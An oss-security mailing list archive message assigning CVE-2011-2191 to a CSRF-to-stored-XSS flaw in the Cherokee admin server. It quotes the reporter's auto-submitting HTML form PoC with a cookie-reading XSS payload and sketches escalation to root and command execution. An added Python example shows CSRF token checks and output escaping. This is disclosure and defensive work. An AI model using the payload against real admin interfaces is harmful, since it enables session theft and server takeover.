oss-sec mailing list archives
Re: Security issue in cherokee
From: Josh Bressers <bressers () redhat com>
Date: Mon, 6 Jun 2011 15:37:46 -0400 (EDT)
As best as I can tell, this is the same request from Jan on 2011-06-02.

Please use CVE-2011-2191

Thanks.

-- JB

----- Original Message -----

A security bug was reported against cherokee in Ubuntu. You are being emailed as the upstream contact. Please keep oss-security[1] CC'd for any updates on this issue. This issue should be considered public, but has not yet been assigned a CVE. Once a CVE is assigned, please mention it in any changelogs.

Details from the public bug follow: https://launchpad.net/bugs/784632

From the reporter:
----
The cherokee admin server is vulnerable to CSRF. Using CSRF it is possible to produce a persistent XSS in several pages, including the 'status' page via the 'nickname' field of a vserver. An example of this is the following:

<html>
<body>
<form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
<input type="text" name="tmp!new_droot" value='/var/www/'></input>
<input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>
</html>

A worst-case scenario could be something like the following: If a user is logged in and the cherokee admin server is running on localhost:9090, then if they visit a $bad page, the bad page may be able to send requests to the server so as to reconfigure it to:
1. run as root
2. the logging of error (or access) will run a command
...
----

Thanks in advance for your cooperation in coordinating a fix for this issue,

Jamie Strandboge

[1] oss-security () lists openwall com is a public mailing list for people to collaborate on security vulnerabilities and coordinate security updates.

-- Jamie Strandboge | http://www.canonical.com
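The report above describes two defects that compound each other: the admin server accepts a state-changing POST from any origin (CSRF), and it later renders the submitted nickname unescaped (stored XSS). The following is an added illustration, not code from cherokee or from the reporter, showing the two checks a defender would expect in front of an endpoint like /vserver/apply: an Origin/Referer check plus a per-session CSRF token, and HTML escaping when the nickname is rendered. The handler, the AdminState class, the csrf_token form field and the request shapes are all constructed for this example; the endpoint path and the field names tmp!new_droot and tmp!new_nick are taken from the report.

```python
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs, urlencode

# Origin of the admin UI; the report has cherokee-admin on 127.0.0.1:9090.
ADMIN_ORIGIN = "http://127.0.0.1:9090"


class AdminState:
    """Stand-in for one authenticated admin session (constructed for this example)."""

    def __init__(self):
        # One unguessable token per session; an attacker's page cannot read it
        # because the same-origin policy blocks it from reading admin responses.
        self.csrf_token = secrets.token_urlsafe(32)
        self.vservers = []  # list of (document_root, nickname)


def csrf_check(headers, form, state):
    """Return None if the request is same-origin and carries the session token,
    otherwise a short reason string. Fails closed when headers are absent."""
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if origin != ADMIN_ORIGIN and not origin.startswith(ADMIN_ORIGIN + "/"):
        return "cross-origin request"
    token = form.get("csrf_token", [""])[0]
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(token, state.csrf_token):
        return "missing or wrong CSRF token"
    return None


def handle_vserver_apply(headers, body, state):
    """Hypothetical hardened handler for POST /vserver/apply.
    Returns (status_code, message)."""
    form = parse_qs(body, keep_blank_values=True)
    reason = csrf_check(headers, form, state)
    if reason is not None:
        return 403, "rejected: " + reason
    droot = form.get("tmp!new_droot", [""])[0]
    nick = form.get("tmp!new_nick", [""])[0]
    state.vservers.append((droot, nick))
    return 200, "ok"


def render_status(state):
    """Render the 'status' page rows with every user-controlled value escaped,
    including quotes, so a nickname can never break out of its cell."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td></tr>"
        % (escape(nick, quote=True), escape(droot, quote=True))
        for droot, nick in state.vservers
    )
    return "<table>" + rows + "</table>"


# The payload from the report, used only to show that it is now neutralised.
REPORTED_NICK = '" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'


def demo():
    """Run three requests against a fresh session and return their outcomes."""
    state = AdminState()
    # 1. Auto-submitted form from another site: browser sends a foreign Origin.
    forged = handle_vserver_apply(
        {"Origin": "http://attacker.invalid"},
        urlencode({"tmp!new_droot": "/var/www/", "tmp!new_nick": REPORTED_NICK}),
        state,
    )
    # 2. Right origin but no token (e.g. a stale or replayed form).
    no_token = handle_vserver_apply(
        {"Origin": ADMIN_ORIGIN},
        urlencode({"tmp!new_droot": "/var/www/", "tmp!new_nick": "site-a"}),
        state,
    )
    # 3. Legitimate request from the admin UI carrying the session token.
    legit = handle_vserver_apply(
        {"Origin": ADMIN_ORIGIN},
        urlencode({"tmp!new_droot": "/var/www/", "tmp!new_nick": REPORTED_NICK,
                   "csrf_token": state.csrf_token}),
        state,
    )
    return forged, no_token, legit, render_status(state)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Two points worth noting about the design. The Origin check alone is not sufficient (older browsers may omit the header, and a lenient check on Referer is easy to get wrong), so the token is the primary control and the header check is defence in depth. Escaping on output with quote=True matters because the reported payload breaks out of an attribute with a double quote; escaping only angle brackets would leave that vector open.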
Current thread:
- Security issue in cherokee Jamie Strandboge (Jun 03)
- Re: Security issue in cherokee Alvaro Lopez Ortega (Jun 06)
- Re: Security issue in cherokee Josh Bressers (Jun 06)